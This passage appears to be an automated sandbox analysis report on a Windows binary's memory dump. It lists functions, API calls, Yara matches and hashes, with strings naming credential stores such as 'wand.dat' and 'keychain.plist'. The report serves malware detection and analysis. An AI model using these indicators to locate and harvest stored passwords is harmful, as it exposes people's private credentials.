                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                    • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                    • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                    • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                    • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                    • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                    • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                    • Part of subcall function 00407AB6: GetOpenFileNameW.COMDLG32(?), ref: 00407AFF
                                                    • Part of subcall function 00407AB6: wcscpy.MSVCRT ref: 00407B0D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                  • String ID: *.*$dat$wand.dat
                                                  • API String ID: 3589925243-1828844352
                                                  • Opcode ID: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                  • Instruction ID: 6d0f55f818233349c8d1636aac4371a0276c995c789a620d4a51b657e5e4e923
                                                  • Opcode Fuzzy Hash: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                  • Instruction Fuzzy Hash: 6F419971A04206AFDB14EF61D885AAE77B4FF40314F10C42BFA05A71C2EF79A9958BD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040CBC1, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                    • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                  • wcslen.MSVCRT ref: 0040CBEF
                                                  • _wtoi.MSVCRT ref: 0040CBFB
                                                  • _wcsicmp.MSVCRT ref: 0040CC49
                                                  • _wcsicmp.MSVCRT ref: 0040CC5A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                  • String ID:
                                                  • API String ID: 1549203181-0
                                                  • Opcode ID: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                  • Instruction ID: 2e88af878a7a0ebae712eab1be6a0374a06ab0ac9bbd2c3eb3becf244d067ed8
                                                  • Opcode Fuzzy Hash: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                  • Instruction Fuzzy Hash: C3416D31900204EBEF21DF59C5C4A9DBBB4EF45319F1546BAEC09EB3A6D638D940CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E51C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @|=D
                                                  • API String ID: 3510742995-4242725666
                                                  • Opcode ID: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                  • Instruction ID: e04d1c669876fac24280ac48723ffca9e388da4b41f072ca806e7767fffd92f4
                                                  • Opcode Fuzzy Hash: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                  • Instruction Fuzzy Hash: 19113BF29003047BDB348E66DC84C5A77A8EB603987000E3EF90696291F675DF69C6D8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412D4A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: -+A$-+A$Y,A
                                                  • API String ID: 2221118986-4154596189
                                                  • Opcode ID: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                  • Instruction ID: 1dfdef816599cc938eba6c7f1cf8632c899ce6bbbbec6bb0dc4dd89a5a59c02f
                                                  • Opcode Fuzzy Hash: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                  • Instruction Fuzzy Hash: 482156799417008FD3268F0AFE0565AB7E5FBE2702724413FE201D62B2D7B4489A8F8C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004084EE, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: 2bd6b428f8dbf6c8ba8eecf3f59a287ad605b09a5cb6ba98fc7a768114adc393
                                                  • Instruction ID: d20edd04bd2483e58964879576c48f2ebc5a647496c0cba51e85d391a6ad2c86
                                                  • Opcode Fuzzy Hash: 2bd6b428f8dbf6c8ba8eecf3f59a287ad605b09a5cb6ba98fc7a768114adc393
                                                  • Instruction Fuzzy Hash: 0D118C71204601AFD328DF2DCA91A26F7E5FFD8340B60892EE4DAC7385EA75E801CB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411A90, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00411ABC
                                                    • Part of subcall function 00407BF7: _snwprintf.MSVCRT ref: 00407C3C
                                                    • Part of subcall function 00407BF7: memcpy.MSVCRT ref: 00407C4C
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00411AE5
                                                  • memset.MSVCRT ref: 00411AEF
                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00411B11
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                  • String ID:
                                                  • API String ID: 1127616056-0
                                                  • Opcode ID: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                  • Instruction ID: 7dd1a1e3bfb09d1cc1018fb107044e1a6d1141f919409e292c6c821828e7f11b
                                                  • Opcode Fuzzy Hash: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                  • Instruction Fuzzy Hash: 48118271500119BFEF11AF61DD02EDE7BB9EF04741F100066FF05B2060E675AA608BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004123CC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 004123DC
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0041240E
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00412422
                                                  • wcscpy.MSVCRT ref: 00412435
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                  • String ID:
                                                  • API String ID: 3917621476-0
                                                  • Opcode ID: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                  • Instruction ID: 5cda3e6a61a15ee9057d47663b3b2e0c0e874c437a77379260a47c7555d96391
                                                  • Opcode Fuzzy Hash: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                  • Instruction Fuzzy Hash: C5110CB5A00208AFDB00DFA9D9889EEB7F8FF49714F10406AE905E7200D779EB45CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0042D603, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: sqlite_master
                                                  • API String ID: 438689982-3163232059
                                                  • Opcode ID: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                  • Instruction ID: ee6e5cfbbe52718914f41d47f1c84030a85cc49ac4fd556a51d86816da10b362
                                                  • Opcode Fuzzy Hash: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                  • Instruction Fuzzy Hash: 6901B972900218BAEB11EFB18D42FDDB77DFF04315F50405AF60462142D77A9B15C7A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040CECE, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                    • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                    • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                  • _snwprintf.MSVCRT ref: 0040CEFB
                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040CF60
                                                    • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                  • _snwprintf.MSVCRT ref: 0040CF26
                                                  • wcscat.MSVCRT ref: 0040CF39
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                  • String ID:
                                                  • API String ID: 822687973-0
                                                  • Opcode ID: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                  • Instruction ID: 10942a5e8a652da15fc5691646fc128facbf295aae85401a998ce48512d7e6da
                                                  • Opcode Fuzzy Hash: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                  • Instruction Fuzzy Hash: 8F0184B19403057AE720E775DC8AFBB73ACAF40709F04046AB719F21C3DA79A9454A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00414C63, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,00414D8E,?), ref: 00414C81
                                                  • malloc.MSVCRT ref: 00414C88
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74B05970,?,00414D8E,?), ref: 00414CA7
                                                  • free.MSVCRT(00000000,?,74B05970,?,00414D8E,?), ref: 00414CAE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$freemalloc
                                                  • String ID:
                                                  • API String ID: 2605342592-0
                                                  • Opcode ID: 1562b6304e5c60342503921195ce0066c0efbc861a8a386339b4f0c24ca6086c
                                                  • Instruction ID: 08e12ed7d8240a3e2c5be9bdce3f46534c50a62d4f36ceba048af803e5c5c189
                                                  • Opcode Fuzzy Hash: 1562b6304e5c60342503921195ce0066c0efbc861a8a386339b4f0c24ca6086c
                                                  • Instruction Fuzzy Hash: CBF0E9B260A21D7E76006FB59CC0C3B7B9CD7863FDB21072FF510A2180F9659C0116B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041538D, Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004153AA
                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004153D6
                                                  • GetLastError.KERNEL32 ref: 004153E4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                  • String ID:
                                                  • API String ID: 3727323765-0
                                                  • Opcode ID: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                  • Instruction ID: b4c6314a975e1eba122d49f899d78a16df92238a1a9f5a4b2f2908291fae13bb
                                                  • Opcode Fuzzy Hash: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                  • Instruction Fuzzy Hash: 7201D131100608FFDB219FA4EC848EBBBB8FB80785F20442AF912D6050D6B09A44CF25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401B06, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00401B27
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                  • wcslen.MSVCRT ref: 00401B40
                                                  • wcslen.MSVCRT ref: 00401B4E
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
                                                  • String ID: Apple Computer\Preferences\keychain.plist
                                                  • API String ID: 3183857889-296063946
                                                  • Opcode ID: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
                                                  • Instruction ID: 16ca9930086f175389a7ca6d9dd60f6601f6a2e2e4035c9292d9b79f31a3f5d2
                                                  • Opcode Fuzzy Hash: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
                                                  • Instruction Fuzzy Hash: F8F0FE7290531476E720A7559C89FDA736C9F00318F6005B7F514E10C3F77CAA5446AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403081, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004030A6
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 004030C3
                                                  • strlen.MSVCRT ref: 004030D5
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004030E6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                  • Instruction ID: e51875297eda531c80c3ec5ec415ee795d437164a5b9689062039e3667910632
                                                  • Opcode Fuzzy Hash: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                  • Instruction Fuzzy Hash: 56F04FB680022CBEFB15AB949DC5DEB776CDB04254F0001A2B709E2041E5749F448B78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040BA53, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040BA78
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00443980,00000000,00000000,00000000,?,00000000,00000000), ref: 0040BA91
                                                  • strlen.MSVCRT ref: 0040BAA3
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BAB4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                  • Instruction ID: f1b04ddda804f0d23e85d9b3a1a681265272c1a7bd8491b11875ee0cd1c6d5d4
                                                  • Opcode Fuzzy Hash: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                  • Instruction Fuzzy Hash: 7CF06DB780022CBEFB059B94DDC9DEB77ACDB04258F0001A2B709E2042E6749F44CB78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041176D, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004076CD: memset.MSVCRT ref: 004076EC
                                                    • Part of subcall function 004076CD: GetClassNameW.USER32 ref: 00407703
                                                    • Part of subcall function 004076CD: _wcsicmp.MSVCRT ref: 00407715
                                                  • SetBkMode.GDI32(?,00000001), ref: 00411794
                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004117A2
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004117B0
                                                  • GetStockObject.GDI32(00000000), ref: 004117B8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                  • String ID:
                                                  • API String ID: 764393265-0
                                                  • Opcode ID: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                  • Instruction ID: 4524e9a356975b07e10c0673c8b36924071ef161512cc5bea393be377801c3c3
                                                  • Opcode Fuzzy Hash: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                  • Instruction Fuzzy Hash: 9AF0A435100209BBDF112F64DC05BDD3F61AF05B25F104636FA25541F5CF769990D648
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040FA51, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$DialogHandleModuleParam
                                                  • String ID:
                                                  • API String ID: 1386444988-0
                                                  • Opcode ID: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                  • Instruction ID: 350a086b8d7ad7ad16c9f4c49a9849c7d3de4f0e2d0f3119e9b48998a0ebe44a
                                                  • Opcode Fuzzy Hash: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                  • Instruction Fuzzy Hash: 49F0A731680310BBEB70AFA4BD4AF163A919705F57F20043AF644A60E2C7B585558B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004048C7, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004048DE
                                                    • Part of subcall function 00412455: LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,004048E6,00000000), ref: 0041245E
                                                    • Part of subcall function 00412455: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                    • Part of subcall function 00412455: FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                  • GetDlgItem.USER32 ref: 004048F0
                                                  • GetDlgItem.USER32 ref: 00404902
                                                  • GetDlgItem.USER32 ref: 00404914
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 2406072140-0
                                                  • Opcode ID: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                  • Instruction ID: 27d5e7a410d711f85fb169ee5f4284aad0304eb1bf7711d039073b83f91ac3c5
                                                  • Opcode Fuzzy Hash: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                  • Instruction Fuzzy Hash: 33F01CB18043026BCB313F72DC09D6FBAADEF84310B010D2EA1D1D61A1CFBE94618A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040DA3A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040DA6F
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040DABB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InvalidateMessageRectSend
                                                  • String ID: <M@
                                                  • API String ID: 909852535-3778786622
                                                  • Opcode ID: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                  • Instruction ID: 05eea1ce1b03382e5db893e26ff0cd35ef39184770bc15fe2d13ad66f6086966
                                                  • Opcode Fuzzy Hash: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                  • Instruction Fuzzy Hash: 89518430E003049ADB20AFA5C845F9EB3A5AF44324F51853BF4197B1E2CAB99D89CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040BABE, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcschr.MSVCRT ref: 0040BB00
                                                  • wcschr.MSVCRT ref: 0040BB0E
                                                    • Part of subcall function 004080BF: wcslen.MSVCRT ref: 004080DB
                                                    • Part of subcall function 004080BF: memcpy.MSVCRT ref: 004080FE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcschr$memcpywcslen
                                                  • String ID: "
                                                  • API String ID: 1983396471-123907689
                                                  • Opcode ID: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                  • Instruction ID: 425732c6536ade4c189e7d45363e94d8349111ce0189a23fa1b0a907d348dab1
                                                  • Opcode Fuzzy Hash: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                  • Instruction Fuzzy Hash: D2317E31904204ABDF04EFA5C8419EEB7F8EF44364B20816BE855B72D5DB78AA41CADC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040928C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                  • _memicmp.MSVCRT ref: 004092A6
                                                  • memcpy.MSVCRT ref: 004092BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FilePointer_memicmpmemcpy
                                                  • String ID: URL
                                                  • API String ID: 2108176848-3574463123
                                                  • Opcode ID: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                  • Instruction ID: 33b3fc867a4e2474f07ea88972ed825a8fcb80c5477311fdb059a6d734a7dbfa
                                                  • Opcode Fuzzy Hash: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                  • Instruction Fuzzy Hash: 8411A031604208BBEB11DF29CC05F5F7BA8AF85348F054066F904AB2D2E775EE10CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407BF7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintfmemcpy
                                                  • String ID: %2.2X
                                                  • API String ID: 2789212964-323797159
                                                  • Opcode ID: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                  • Instruction ID: 0f19ce75f7d61601c6dcaf4457f6717ff276ffca2b35b3dd887d371e09c964f6
                                                  • Opcode Fuzzy Hash: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                  • Instruction Fuzzy Hash: 87117C32908209BEEB10DFE8C9C69AE73A8BB45714F108436ED15E7141D678AA158BA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004153F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00415610,?,00000000), ref: 0041542C
                                                  • CloseHandle.KERNEL32(?), ref: 00415438
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandleUnmapView
                                                  • String ID: !-A
                                                  • API String ID: 2381555830-3879722540
                                                  • Opcode ID: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
                                                  • Instruction ID: 6c5ed3bf8746cf55bcd37c1067f9027f6bc59eb5530dee428a664ff8177fa162
                                                  • Opcode Fuzzy Hash: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
                                                  • Instruction Fuzzy Hash: 5611BF35500B10DFCB319F25E945BD777E0FF84712B00492EE4929A662C738F8C48B48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040BD10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _snwprintf.MSVCRT ref: 0040BD3E
                                                  • _snwprintf.MSVCRT ref: 0040BD5E
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintf$FileWritewcslen
                                                  • String ID: %%-%d.%ds
                                                  • API String ID: 889019245-2008345750
                                                  • Opcode ID: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                  • Instruction ID: f6bde454874e3f12fe5a715dcb314e2825e8b387052435345983f70e28f49e73
                                                  • Opcode Fuzzy Hash: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                  • Instruction Fuzzy Hash: 1D01D871500604BFD7109F69CC82D6AB7F9FF48318B10442EF946AB2A2DB75F841DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408116, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _memicmpwcslen
                                                  • String ID: History
                                                  • API String ID: 1872909662-3892791767
